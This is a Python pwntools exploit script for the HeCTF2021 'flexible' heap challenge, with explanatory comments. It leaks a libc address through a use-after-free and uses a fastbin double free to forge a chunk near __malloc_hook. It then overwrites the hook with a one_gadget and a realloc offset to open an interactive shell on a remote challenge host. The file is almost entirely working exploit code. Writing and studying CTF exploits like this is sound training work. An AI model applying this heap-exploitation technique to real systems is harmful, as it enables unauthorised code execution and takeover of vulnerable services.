HeCTF2021

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

# Session-wide pwntools settings: 64-bit Linux target, verbose I/O tracing so every
# byte exchanged with the program shows up in the log.
context.update(os='linux', arch='amd64', log_level='debug')

# Which endpoint to talk to: 1 = spawn the binary locally, 2 = the challenge host,
# 3 = a listener on this machine.
debug = 2
filename = 'flexible'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('123.56.242.200 ', 10004)
elif debug == 3:
    p = remote('127.0.0.1', 12345)

# The challenge binary and the libc build shipped with it. Symbols are resolved from
# that file rather than from the host's libc, so the offsets below only hold for it.
elf = ELF(filename)
libc = ELF("./libc-2.23.so")

def cmd(index):
    """Pick menu entry *index* once the program shows its ``choice >>`` prompt."""
    choice = str(index)
    p.sendlineafter('choice >>', choice)

def add(index, size, name, content):
    """Menu option 1: fill slot *index* with a *size*-byte allocation.

    *index*, *size* and *name* are coerced with ``str()``; *content* is sent
    exactly as given, so callers may pass raw payload data for it.
    """
    cmd(1)
    for prompt, answer in (
        ('Choice your index >>', str(index)),
        ('size >>', str(size)),
        ('what is your name >>', str(name)),
        ('Input your context >>', content),
    ):
        p.sendlineafter(prompt, answer)

def edit(index, content):
    """Menu option 2: overwrite slot *index* with *content* (sent verbatim)."""
    cmd(2)
    for prompt, answer in (
        ('Choice your index >', str(index)),
        ('Input your context >>', content),
    ):
        p.sendlineafter(prompt, answer)

def free(index):
    """Menu option 3: release slot *index*."""
    cmd(3)
    slot = str(index)
    p.sendlineafter('Choice your index >', slot)

def show(index):
    """Menu option 4: have the program print slot *index*.

    Nothing is read back here; whatever the program prints stays in ``p``'s
    receive buffer for the caller to parse.
    """
    cmd(4)
    slot = str(index)
    p.sendlineafter('Choice your index >', slot)



# Seven slots up front: two with a requested size of 0x70, five with 0x50.
add(0,0x70,'a','b')
add(1,0x70,'a','b')
add(2,0x50,'a','b')
add(3,0x50,'a','b')
add(4,0x50,'a','b')
add(5,0x50,'a','b')
add(6,0x50,'a','b')

# Release slot 1 and immediately ask the program to print it. The program still
# dereferences the released slot (a use-after-free in the target), and the bytes
# it prints are parsed as a libc pointer just below.
free(1)
show(1)


# Read the show() output up to the first 0x7f byte and take the last six bytes as a
# little-endian pointer. ljust() pads a Python 2 str; on Python 3 recvuntil returns
# bytes and padding with a str fill raises TypeError. The 88 and 0x10 offsets are
# constants the author fixed for the bundled glibc 2.23 arena layout.
main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -88
malloc_hook = main_arena_addr - 0x10

# Rebase the symbols of ./libc-2.23.so against the leaked address.
libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
realloc = libc_base + libc.sym['realloc']

# NOTE(review): the free_hook-based value is dead code — it is overwritten on the
# very next line and never read.
fake_fast_addr = free_hook - 0x13
fake_fast_addr = malloc_hook - 0x23

# Offsets hard-coded for this specific libc build; only index 1 is used below.
one_16 = [0x45226,0x4527a,0xf03a4,0xf1247]

one_gadget = libc_base + one_16[1]

# Slot 3 is released twice, with slot 4 released in between: the program evidently
# does not invalidate a slot when it is freed. This sequence only goes unnoticed on
# the bundled glibc 2.23; glibc 2.29 and later abort here with
# "free(): double free detected in tcache 2".
free(3)
free(4)
free(3)

# Four fresh 0x50 allocations. Three pass the computed address as the 'name' field
# (presumably stored inside the recycled slot — not verifiable from here), the
# fourth passes an empty name and empty content.
add(3,0x50,p64(fake_fast_addr),'')
add(4,0x50,p64(fake_fast_addr),'')
add(5,0x50,p64(fake_fast_addr),'')
add(6,0x50,'','')

# Python 2 only: on Python 3 pwntools' p64() returns bytes and concatenating it with
# the str padding raises TypeError. The result is written into slot 6 via menu option 2.
payload = '\x00'*0xb + p64(one_gadget) + p64(realloc + 14 )
edit(6,payload)






# Report every address derived from the leak before handing the session to the user.
for label, value in (
    ('libc_base', libc_base),
    ('main_arena_addr', main_arena_addr),
    ('malloc_hook', malloc_hook),
    ('system_addr', system_addr),
    ('free_hook', free_hook),
    ('fake_fast_addr', fake_fast_addr),
):
    log.success(label + ': ' + hex(value))

# gdb.attach(p)  # uncomment to attach a debugger before going interactive
p.interactive()